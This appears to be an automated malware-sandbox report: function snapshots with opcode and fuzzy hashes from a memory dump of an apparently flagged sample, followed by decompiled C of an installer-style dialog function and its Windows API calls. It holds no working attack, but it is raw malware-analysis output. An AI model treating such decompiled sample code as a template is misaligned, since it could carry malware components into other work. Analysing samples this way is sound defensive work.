Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 263fab1f8bb59e50f6b7d22599515df391036ecb507fec75771487bc0e68ef99
Instruction ID: a87230c48bb78b9f0f5324993fe692e884172c530959d18886ef2e15049028ce
Opcode Fuzzy Hash: 263fab1f8bb59e50f6b7d22599515df391036ecb507fec75771487bc0e68ef99
Instruction Fuzzy Hash: 34116D2052578ACBBF30CE6A59D47E6B7671F43700FA5856FCC4226646C29104C68F42

Uniqueness

Uniqueness Score: -1.00%

Function 032A2721 Relevance: .1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b488e103cd5d60ae33706d1999e3548f31071001f73186cd99952fa5fc49abe6
Instruction ID: 5eb50ce703763779900d18dc4ffcefefabf25b7353187cd5eecb5b1d3c4d534c
Opcode Fuzzy Hash: b488e103cd5d60ae33706d1999e3548f31071001f73186cd99952fa5fc49abe6
Instruction Fuzzy Hash: 24212E2092538ECBFF60CE6A59D07EA77671F43744F99856FCC4266586C3A004C58F42

Uniqueness

Uniqueness Score: -1.00%

Function 032A2761 Relevance: .1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dd8eacfb1735b727c6cf2df81381c83b93fe49ef1d4592a6d4c35c31d7ede81
Instruction ID: dc2c0e19851f20678104161f36d6625434010fc8f7e8229683953830eb5b1742
Opcode Fuzzy Hash: 4dd8eacfb1735b727c6cf2df81381c83b93fe49ef1d4592a6d4c35c31d7ede81
Instruction Fuzzy Hash: FE21EE2091538ECBFB60CE7A59D47DAB7675F43744F99C56FCC4266686C3A004C58F81

Uniqueness

Uniqueness Score: -1.00%

Function 032A3664 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 409447d3caf4c49dec8438e24ed3e9823129525774b1417654accb8c20a1cba8
Instruction ID: 6e1ab3aa99afb343195f683eeb41912c4d74d1b388246006b2d525ea09cdda3f
Opcode Fuzzy Hash: 409447d3caf4c49dec8438e24ed3e9823129525774b1417654accb8c20a1cba8
Instruction Fuzzy Hash: F721013490A6DE8BF712CF368D51689BFB2AE43644F9D85DDC8806B6C7C3605496CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 032A27A6 Relevance: .1, Instructions: 69libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 851ecd5ed0f11aa309ef02199026eaa8d45b8d4cefd903d444b36e0e297fb7d5
Instruction ID: 60e7f65a307a96c5aedb094c768280db7b29bf868096b4275b6b06688de384a9
Opcode Fuzzy Hash: 851ecd5ed0f11aa309ef02199026eaa8d45b8d4cefd903d444b36e0e297fb7d5
Instruction Fuzzy Hash: 9B21F92091539ACBFB60CF7A59D07DA77665F43744FA9816FCC4267286C3A004C68F81

Uniqueness

Uniqueness Score: -1.00%

Function 032A727F Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4b27cd1b610e771fa60c241dec7125a0664e3f785d4165e458f4ce3a81f89d
Instruction ID: 4ba12e8baaf085eca365e8c542cc3cbcce92a49cb3c748b634c97d6a1891913d
Opcode Fuzzy Hash: 1c4b27cd1b610e771fa60c241dec7125a0664e3f785d4165e458f4ce3a81f89d
Instruction Fuzzy Hash: 3B2196318113C99BFB70CF29CD557CE7BA26F52750FAA866ECC459B285C2701AC28B81

Uniqueness

Uniqueness Score: -1.00%

Function 032A981D Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036c64c7f04e5bc8ff45b4440beb7aa495ccf84a0826a751b1c39de0d82774de
Instruction ID: be4c94c864f056645960a45bfd2f9eb8830bd6c33d231ec34dc6b41096749bcd
Opcode Fuzzy Hash: 036c64c7f04e5bc8ff45b4440beb7aa495ccf84a0826a751b1c39de0d82774de
Instruction Fuzzy Hash: 9531EA318083DE8FEB56CF7A89446857FB1AF43654F1A89DDC8806B697C3700585CB80

Uniqueness

Uniqueness Score: -1.00%

Function 032AED93 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 33b64955fe7e47a4824d232cf237f2003d3bc1d5043240b2e84bd8642f1d4495
Instruction ID: ab193523b1c63189191384aa5cd6723439a7417c785c75c9dad749d1b9bfe819
Opcode Fuzzy Hash: 33b64955fe7e47a4824d232cf237f2003d3bc1d5043240b2e84bd8642f1d4495
Instruction Fuzzy Hash: BC216D349093DE4FF752DF3AC8442C9BFA2AF43650F19C9DDC8806B286C660109BCB90

Uniqueness

Uniqueness Score: -1.00%

Function 032AACD9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98133407e53708788a6bfbd5cc216a325a2f781e2a9d45c9ed7a94f19771d66d
Instruction ID: a4d0566d88c9b161fe169a390cf3e67d02e02a12cf92925202dd0bd02ac0a651
Opcode Fuzzy Hash: 98133407e53708788a6bfbd5cc216a325a2f781e2a9d45c9ed7a94f19771d66d
Instruction Fuzzy Hash: 22218076C153A98BF761CF2ACA407C9BBB1BF52744F4A859ECC006B356D3B05C458B80

Uniqueness

Uniqueness Score: -1.00%

Function 032AA95F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8dcc4931b7c2d9cc58d2f1f8bcbd8d7a8eb078533ace6660552eef390948a4
Instruction ID: 0fcbd22ddd82892e1477c8d41c26361bb6870b24eb90b416697ab0d09176a1f3
Opcode Fuzzy Hash: 9b8dcc4931b7c2d9cc58d2f1f8bcbd8d7a8eb078533ace6660552eef390948a4
Instruction Fuzzy Hash: 5E21B5708493AA8FF776CF35C5807957BB2BF52308F6985ADC8515A906C3715887CF40

Uniqueness

Uniqueness Score: -1.00%

Function 032AAE18 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0412e63855d2028f6c03d1c6e040f9db363ddc817529d97fcb2d02d35f2aa6
Instruction ID: 5aab0a8bebb61486b9c97ae31367992f3a439642f398a47a39d6d8679e891968
Opcode Fuzzy Hash: 5a0412e63855d2028f6c03d1c6e040f9db363ddc817529d97fcb2d02d35f2aa6
Instruction Fuzzy Hash: D921453181A3888FEB65CF2A8A80686BB65BF65780F59C0AD8C055B256C3B09895CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032B29B3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9bf01999bd1e39824cdf0f3d3c349c588fd3d4640e8c8102d5f4cbd3757863
Instruction ID: cfce16ac48e8a3e135c21fb5408972e3e30c2eec860d9dec6d02f3faac463695
Opcode Fuzzy Hash: 0d9bf01999bd1e39824cdf0f3d3c349c588fd3d4640e8c8102d5f4cbd3757863
Instruction Fuzzy Hash: 48110471504345DFDF74DE758CD97EBBBB2BF94740F50852EC98B82524D6304980C612

Uniqueness

Uniqueness Score: -1.00%

Function 032B19AA Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880ed84632ab1d6ad1cd1312dde969e94a82ac254fef73d622159b2ccaee7b0a
Instruction ID: 89667af5a1d28160f68bf595cca37619193dc022cd4d3f199b8301abcf70cf43
Opcode Fuzzy Hash: 880ed84632ab1d6ad1cd1312dde969e94a82ac254fef73d622159b2ccaee7b0a
Instruction Fuzzy Hash: CB117C71610246CFCB64CE18C9A8BD573F6AFA8390F15402ADC4ACB220D770EA91CB40

Uniqueness

Uniqueness Score: -1.00%

Function 032A5C87 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e4b883f316f58122b1d0388ee257998a931d9b6c567934433a925a6d8f4e97
Instruction ID: 3e26c7e86444ac412f7d6bb2dac2d72ee4c13207a5f01346a4625f278d8d4a28
Opcode Fuzzy Hash: 19e4b883f316f58122b1d0388ee257998a931d9b6c567934433a925a6d8f4e97
Instruction Fuzzy Hash: E411FB319093DE8FF756CF368D41685BFA26F43604B59C6DEC880AB287C3605999CB80

Uniqueness

Uniqueness Score: -1.00%

Function 032A7308 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c0ab55f421eafc86504cd3a4b474015dc316e995666c9eadd33a2cfebfca73
Instruction ID: 1c319a03b2276e5d5838420f5b2a8fbe79ea7a02a185b53194d0a81b1cb579d7
Opcode Fuzzy Hash: b8c0ab55f421eafc86504cd3a4b474015dc316e995666c9eadd33a2cfebfca73
Instruction Fuzzy Hash: 801130318052DD87FB61CF2AC9557CDBBA2AF52354F5A819ECC449B285C2751A868B80

Uniqueness

Uniqueness Score: -1.00%

Function 032A6013 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90118b1b84a02022c87478019146db0b4590dc92d527baacadbfb6665d758d3
Instruction ID: 2cf8c79c24593e5039ae2b83bacca519666d6891cc3b89b60e919832b262ecbb
Opcode Fuzzy Hash: a90118b1b84a02022c87478019146db0b4590dc92d527baacadbfb6665d758d3
Instruction Fuzzy Hash: 31015E718196DD8BF751CF3A8940755BF73AE83644B5DCADED88067286C3B010D6DB81

Uniqueness

Uniqueness Score: -1.00%

Function 032B11C1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e7d4d62afebfeb78b25a2a71ade9aacf5d31844a0d5978ece2e630acb924e4
Instruction ID: 772831d0ae1b12c7e4c315b6e86495ce0b897fc486ba288e249c8a922eed262c
Opcode Fuzzy Hash: d8e7d4d62afebfeb78b25a2a71ade9aacf5d31844a0d5978ece2e630acb924e4
Instruction Fuzzy Hash: 87B00275651640CFCE55CF09D1D1F8173B5F755750F5154D0E85187B11C365E904CE11

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
